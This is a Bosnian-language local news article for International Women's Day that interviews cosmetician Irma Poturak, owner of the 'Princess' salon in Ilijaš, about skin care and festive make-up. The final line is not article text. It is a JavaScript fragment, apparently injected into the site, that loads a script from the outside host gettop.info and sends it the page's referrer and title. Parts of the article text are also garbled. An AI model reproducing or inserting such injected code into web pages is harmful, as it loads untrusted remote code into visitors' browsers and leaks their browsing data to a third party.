Naše drage dame savjetuje kozmetičarka Irma Poturak

irmaaSamo za 8. mart  za naše dame smo razgovarali sa kozmetičarkom Irmom Poturak, predivnom i uspješnom damom koja svojim osmijehom zaista potvrđuje da je osmijeh najljepši ukras ženskog lica. Naime, Irma Poturak je vlasnica kozmetičkog salona “Princess” u Ilijašu, koji nudi usluge profesionalnog šminkanja, solarija, japanskog iscrtavnja obrva, čupanja i oblikovanja obrva, nadogradnju trepavica, depilaciju i masažu. Salon se nalazi u ulici 126. ilijaške brigade br.63 i svim damam nudi vrhunsku uslugu. O pravilima čuvanja i njegovanja ljepote, Irma savjetuje:

,,Prvenstveno svim damama želim sretan praznik i želim im da svu pažnju koju danas dobiju imaju i svakog drugog dana u godini. Za zdrav, svjež i lijep izgled trebamo se potruditi, zdravo se hraniti, imati dovoljno sna i ne odavati se porocima. Izbjegavati prekomjerno konzumiranje kofeina i kasno surfanje internetom.”

Zdrava koža lica je preduvjet ljepote, ali mnogim ženama je teško dostižna. Ubrzani tempo života, nezdrava prehrana, irmaaavanjski čimbenici, sve to utječe na najveći ljudski organ, pri čemu je koža lica najizloženija i najosjetljivija.

,,Što se tiče njege lica, odnosno kože, njegu treba svakodnevno održavati, a ne samo pred neke posebne prilike. To je dugotrajan proces koji zahtjeva redovne tretmane i tek tada mogu se očekivati zavidni rezultati.”

Obzirom da su pripreme za večerašnju proslavu praznika svih žena u toku, velikodušna Irma je našu slušateljku Lejlu Šehić nagradila kompletnim šminkanjem. Dok ostalim damama za večeras preporučuje za razliku od dnevnog, malo jači make up.

,, Za svečane prilike, kao što je današnja, ljepši spol sebi može dopustiti malo više hrabrosti i make up sa jačim tonovima, kao što je crveni ruž i tuš i tamnije sjene.”

10623406_1228610890488561_181274636960017805_oPojam ženske ljepote je kroz vremena varirao i nametao razne standarde i trendove, ali je osmijeh uvijek ostao nezamjenjiva i unikatna crta ženine ljepote. Stoga naše drage dame budite uvijek nasmijane, njegovane i pažene jer žena koja ima otvoren osmijeh i prijatan izraz lica ima ljepotu bez obzira šta nosi.

 s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;